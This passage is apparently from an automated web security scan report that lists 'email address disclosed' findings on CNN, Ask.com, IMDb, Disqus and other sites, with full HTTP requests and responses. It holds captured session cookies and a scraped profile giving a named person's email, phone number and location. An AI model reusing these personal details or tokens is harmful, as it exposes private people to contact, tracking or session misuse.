   switch (_contactImportSource)
   {
       case 'LinkedIn':
           i += 'yourname@company.com';
           break;
       case 'Yahoo':
           i += 'yourname@yahoo.com';
           break;
       case 'Gmail':
           i += 'yourname@gmail.com';
           break;
       case 'Hotmail':
           i += 'yourname@hotmail.com';
           break;
       default:
           i = '';
           break;
   }
   d.addRow('<div">
...[SNIP]...
Trading"}},{"id":12,"skill":{"name":"Quantitative Finance"}}],"_total":10},"lastName":"Seitel","location":{"postalCode":"94110","name":"San Francisco Bay Area","country":{"code":"us"}},"emailAddress":"seitel@caltech.edu","phoneNumbers":{"values":[{"phoneNumber":"4252334244","phoneType":"application"}],"_total":1},"id":"X8KEuwzQsD","publicProfileUrl":"http://www.linkedin.com/in/seitel","positions":{"values":[{"summary
...[SNIP]...

15.3. http://mediacdn.disqus.com/1313183665/build/system/disqus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1313183665/build/system/disqus.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1313183665/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=984705233015

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 12 Aug 2011 21:44:49 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 177055
X-Varnish: 976827556 976826927
Cache-Control: max-age=2343559
Expires: Sun, 11 Sep 2011 21:45:25 GMT
Date: Mon, 15 Aug 2011 18:46:06 GMT
Connection: close

DISQUS.dtpl=function(){var c={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>",getAction:function(a,e){function b(){var a=Array.prototype.slice.call(arguments);a.unshift(DISQUS.dtpl.actions.fi
...[SNIP]...

15.4. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /2011/08/15/technology/google_motorola/index.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:30 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:00 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 45778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Google to buy Motorola
...[SNIP]...
<a href="mailto:david.goldman@turner.com">
...[SNIP]...

15.5. http://news.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?output=rss HTTP/1.1
Host: news.google.com
User-Agent: Apple-PubSub/28
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Expires: Mon, 15 Aug 2011 19:06:40 GMT
Date: Mon, 15 Aug 2011 19:01:40 GMT
Content-Type: application/xml; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=300
Age: 270
Content-Length: 50514

<rss version="2.0"><channel><generator>NFE/1.0</generator><title>Top Stories - Google News</title><link>http://news.google.com/news?pz=1&amp;jfkl=true&amp;ned=us&amp;hl=en</link><language>en</language
...[SNIP]...
<webMaster>news-feedback@google.com</webMaster>
...[SNIP]...

15.6. http://sp.ask.com/en/docs/a14/about/legal/privacy_policy_v1_9.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sp.ask.com
Path:   /en/docs/a14/about/legal/privacy_policy_v1_9.html

Issue detail

The following email address was disclosed in the response:

Request

GET /en/docs/a14/about/legal/privacy_policy_v1_9.html HTTP/1.1
Host: sp.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEwLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix)
Last-Modified: Fri, 01 Jul 2011 01:05:23 GMT
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 15273
Cache-Control: max-age=21600
Expires: Tue, 16 Aug 2011 00:28:13 GMT
Date: Mon, 15 Aug 2011 18:28:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
   <head>
       <title>
           Ask.com Privacy Policy
       </title>
       <style type="text/css">
.txt_xlg {
           font-size: 153.9%;
           line-height: 24p
...[SNIP]...
<a href="mailto:privacyhelp@ask.com">
...[SNIP]...
<a href="mailto:privacyhelp@ask.com">
...[SNIP]...

15.7. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tech.fortune.cnn.com
Path:   /2011/08/15/is-google-buying-motorola-for-its-17000-patents/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/08/15/is-google-buying-motorola-for-its-17000-patents/?hpt=hp_t2 HTTP/1.1
Host: tech.fortune.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=cnn-adbp-domestic%3D%2526pid%253Dcnn%25253Ain%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fhpt%25253Dhp_t2%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:45:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 15 Aug 2011 18:42:08 +0000
Cache-Control: max-age=78, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://tech.fortune.cnn.com/xmlrpc.php
Link: <http://wp.me/pzwtX-ho8>; rel=shortlink
X-nananana: Batcache
Content-Length: 55624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en">
<!--
   generated 222 seconds ago
   generated in 0.232
...[SNIP]...
<a href="mailto:ped@mac.com">
...[SNIP]...

15.8. http://w.sharethis.com/button/buttons.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE4fCaYVTTzg6idhAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Expires: Tue, 16 Aug 2011 18:14:33 GMT
Cache-Control: max-age=86400
Content-Length: 58163
Date: Mon, 15 Aug 2011 18:45:32 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
rn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.debug("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b=stLight.getSource();stLight.log("pview",b,"");stWidget.options.sessionID=stLight.sessionID;stWidget.options.fpc=stLight.fpc;stButtons.onReady()};stLight.getSource=function(){var a=
...[SNIP]...

15.9. http://www.ask.com/about/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help

Issue detail

The following email address was disclosed in the response:

Request

GET /about/help HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/ask-site-policies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRwpcQDkAACJXoqMAAAD5
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 48733
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:55 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Help Center</title>


<link href="http://
...[SNIP]...
<a href="mailto:jobs@ask.com">jobs@ask.com</a>
...[SNIP]...

15.10. http://www.ask.com/about/help/webmasters  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help/webmasters

Issue detail

The following email address was disclosed in the response:

Request

GET /about/help/webmasters HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnTgpcQDYAAEsEKyYAAAD-
from-tr: trafrt006iad.io.askjeeves.info
Content-Length: 48732
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:02 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:02 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Webmasters</title>


<link href="http://w
...[SNIP]...
<a href="mailto:jobs@ask.com">jobs@ask.com</a>
...[SNIP]...

15.11. http://www.ask.com/about/legal/ask-site-policies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/ask-site-policies

Issue detail

The following email address was disclosed in the response:

Request

GET /about/legal/ask-site-policies HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjMyLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRgpcQXEAAHdxrIgAAAAW
from-tr: trafrt003iad.io.askjeeves.info
Cache-Control: private
Content-Length: 49517
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:54 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:54 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Ask Site Policies</title>


<link href="h
...[SNIP]...
<a href="mailto:jobs@ask.com">jobs@ask.com</a>
...[SNIP]...

15.12. http://www.ask.com/staticcontent/about/legal/about_legal_notices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /staticcontent/about/legal/about_legal_notices

Issue detail

The following email address was disclosed in the response:

Request

GET /staticcontent/about/legal/about_legal_notices HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/ask-site-policies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRwpcQXIAABTil6UAAAEZ
from-tr: trafrt004iad.io.askjeeves.info
Content-Length: 14604
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:55 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:55 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Ask Site Policies</title>
<style type="text/css">
.txt_xlg {
font-size: 153.9%;
...[SNIP]...
<a href='mailto:copyright@ask.com'>copyright@ask.com</a>
...[SNIP]...

15.13. http://www.imdb.com/showtimes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /showtimes/

Issue detail

The following email address was disclosed in the response:

Request

GET /showtimes/ HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc17%3Bs%3Dc4%3Bs%3Dc12%3Bs%3Dc1%3B; cs=fk/1slmnCWROKLucXD2/yQmPkiSO2RISy93xVI2aRvKt6pe36I4ChD7ZEhO2uZqUjbpRBA3qUReuegEXntkSFCmZUgSO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; __utma=168836921.779117687.1313426596.1313426596.1313432700.2; __utmb=168836921.0.10.1313432700; __utmc=168836921; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:29 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 80797


<!DOCTYPE html>
<html
xmlns:og="http://ogp.me/ns#"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">var IMDbTimer={starttime: new Date().getTime()};</
...[SNIP]...
<a href="mailto:showtimes-feedback@imdb.com">
...[SNIP]...

15.14. http://www.imdb.com/showtimes/title/tt1650062/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /showtimes/title/tt1650062/

Issue detail

The following email address was disclosed in the response:

Request

GET /showtimes/title/tt1650062/ HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/showtimes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; cs=fk/1slmnCWROKLucXD2/yQmPkiSO2RISy93xVI2aRvKt6pe36I4ChD7ZEhO2uZqUjbpRBA3qUReuegEXntkSFCmZUgSO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; __utma=168836921.779117687.1313426596.1313426596.1313432700.2; __utmb=168836921.0.10.1313432700; __utmc=168836921; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc1%3Bs%3Dc12%3Bs%3Dc17%3Bs%3Dc4%3B

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:41:08 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 46200


<!DOCTYPE html>
<html
xmlns:og="http://ogp.me/ns#"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">var IMDbTimer={starttime: new Date().getTime()};</
...[SNIP]...
<a href="mailto:showtimes-feedback@imdb.com">
...[SNIP]...

15.15. http://www.redhat.com/j/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redhat.com
Path:   /j/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.redhat.com
Proxy-Connection: keep-alive
Referer: http://www.redhat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
